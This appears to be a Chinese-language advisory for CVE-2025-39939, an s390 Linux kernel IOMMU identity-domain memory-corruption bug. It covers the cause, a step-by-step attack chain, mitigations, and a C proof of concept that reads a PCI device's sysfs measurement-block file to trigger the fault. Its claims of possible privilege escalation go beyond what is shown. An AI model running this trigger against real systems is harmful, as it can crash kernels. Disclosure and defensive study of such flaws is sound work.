CVE-2025-39939 Linux内核s390 IOMMU身份域内存损坏漏洞

漏洞信息

漏洞编号

CVE-2025-39939

漏洞类型

内存越界访问/内存损坏

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel (s390架构 IOMMU子系统)

漏洞概述

CVE-2025-39939是Linux内核s390架构IOMMU子系统中存在的一个高危内存损坏漏洞。该漏洞位于`zpci_get_iommu_ctrs()`函数中，当系统使用identity domain（身份映射域）为PCI设备配置IOMMU时，由于identity domain并非由`s390_domain`结构体支撑，函数通过`to_s390_domain()`宏进行类型转换时会得到一个无效的地址（初始值为零）。该地址在后续通过sysfs读取设备统计信息时会被按需读取，从而触发KASAN（Kernel Address Sanitizer）检测到全局越界访问错误（global-out-of-bounds），具体表现为`zpci_fmb_enable_device`函数中的BUG报告。攻击者在拥有本地低权限的情况下，可利用该漏洞触发内存损坏，可能导致内核崩溃、信息泄露或权限提升。该漏洞影响机密性、完整性和可用性，CVSS评分为7.8，属于高危级别。漏洞已在Linux内核主线通过提交17a58caf3863163c4a84a218a9649be2c8061443和b3506e9bcc777ed6af2ab631c86a9990ed97b474进行修复。

技术细节

该漏洞的根本原因在于s390架构IOMMU子系统中identity domain与s390_domain结构体的不匹配设计。在Linux内核的s390 IOMMU实现中，`zpci_get_iommu_ctrs()`函数用于获取PCI设备的IOMMU计数器信息，这些计数器作为设备统计信息的一部分存储在`s390_domain`结构体中。函数内部通过`to_s390_domain()`宏将通用domain指针转换为`s390_domain`类型指针以访问计数器字段。然而，identity domain是一种特殊的IOMMU域，它使用恒等映射（identity mapping），并不包含`s390_domain`结构体的私有数据。当对identity domain执行`to_s390_domain()`转换时，宏会基于container_of机制计算出一个错误的地址偏移，该地址指向内存中的零值区域（bss段或未初始化区域）。此地址随后在sysfs读取触发`zpci_fmb_enable_device`时被解引用，导致全局越界内存访问。KASAN能够捕获此类越界访问并报告BUG。攻击向量为本地攻击（AV:L），攻击复杂度低（AC:L），仅需低权限（PR:L），无需用户交互（UI:N），可造成高机密性影响（C:H）、高完整性影响（I:H）和高可用性影响（A:H）。修复方案是在identity domain情况下直接返回NULL，跳过计数器获取逻辑，因为identity domain本身不需要这些统计计数器。

攻击链分析

STEP 1

步骤1：环境准备

攻击者需要在运行受影响Linux内核的s390架构系统上获得本地低权限访问权限。系统需配置IOMMU并对至少一个PCI设备使用identity domain（身份映射域）。

STEP 2

步骤2：定位目标设备

攻击者通过sysfs文件系统定位使用identity domain的PCI设备路径，通常位于/sys/bus/pci/devices/目录下。

STEP 3

步骤3：触发漏洞代码路径

攻击者读取PCI设备的function_measurement_block（功能测量块）sysfs条目，触发内核调用zpci_fmb_enable_device()，进而调用zpci_get_iommu_ctrs()函数。

STEP 4

步骤4：触发内存损坏

在zpci_get_iommu_ctrs()中，to_s390_domain()宏对identity domain执行无效的类型转换，产生指向零值区域的错误地址，该地址被解引用时触发KASAN全局越界访问错误。

STEP 5

步骤5：利用后果

内存损坏可能导致内核崩溃（拒绝服务）、敏感信息泄露，或在特定条件下实现权限提升，攻击者可获得对系统的完全控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-39939 PoC - Trigger memory corruption via identity domain on s390
// This PoC demonstrates how to trigger the KASAN global-out-of-bounds bug
// in zpci_fmb_enable_device when using identity domain for a PCI device.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>

// Path to the PCI device's function measurement block (FMB) sysfs entry
// On s390 systems, this triggers zpci_fmb_enable_device -> zpci_get_iommu_ctrs
#define PCI_FMB_SYSFS_PATH "/sys/bus/pci/devices/0000:00:00.0/function_measurement_block"

// Function to enable FMB (Function Measurement Block) for a PCI device
// This will internally call zpci_fmb_enable_device which triggers the bug
int enable_pci_fmb(const char *device_path) {
    char path[512];
    int fd;
    char buf[4096];
    ssize_t ret;

    // Construct the sysfs path for the PCI device's FMB
    snprintf(path, sizeof(path), "%s", device_path);

    // Open the sysfs file to read device statistics
    // This triggers zpci_get_iommu_ctrs() which causes the memory corruption
    fd = open(path, O_RDONLY);
    if (fd < 0) {
        perror("open");
        return -1;
    }

    // Read the sysfs file - this triggers the vulnerable code path
    // When the device uses identity domain, to_s390_domain() returns
    // an invalid address, causing KASAN to detect global-out-of-bounds
    ret = read(fd, buf, sizeof(buf) - 1);
    if (ret < 0) {
        perror("read");
        close(fd);
        return -1;
    }

    buf[ret] = '\0';
    printf("FMB data read: %s\n", buf);
    close(fd);
    return 0;
}

int main(int argc, char *argv[]) {
    const char *device_path;

    if (argc > 1) {
        device_path = argv[1];
    } else {
        device_path = PCI_FMB_SYSFS_PATH;
    }

    printf("CVE-2025-39939 PoC - s390 IOMMU Identity Domain Memory Corruption\n");
    printf("Attempting to trigger KASAN global-out-of-bounds...\n");

    // Trigger the vulnerability by reading FMB sysfs entry
    // for a PCI device using identity domain
    if (enable_pci_fmb(device_path) < 0) {
        fprintf(stderr, "Failed to trigger vulnerability.\n");
        fprintf(stderr, "Note: This requires s390 architecture with IOMMU identity domain configured.\n");
        return 1;
    }

    printf("Vulnerability triggered. Check dmesg for KASAN report.\n");
    return 0;
}

影响范围

Linux Kernel < 6.17 (s390 IOMMU子系统受影响版本)

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）限制对/sys/bus/pci/devices/目录下sysfs条目的非特权用户访问权限；2）在s390系统中避免配置identity domain，改用标准IOMMU域；3）监控系统日志（dmesg）以检测KASAN报告，及时发现异常内存访问；4）如非必要，禁用function_measurement_block功能以避免触发漏洞代码路径；5）限制本地用户权限，实施最小权限原则，减少攻击面。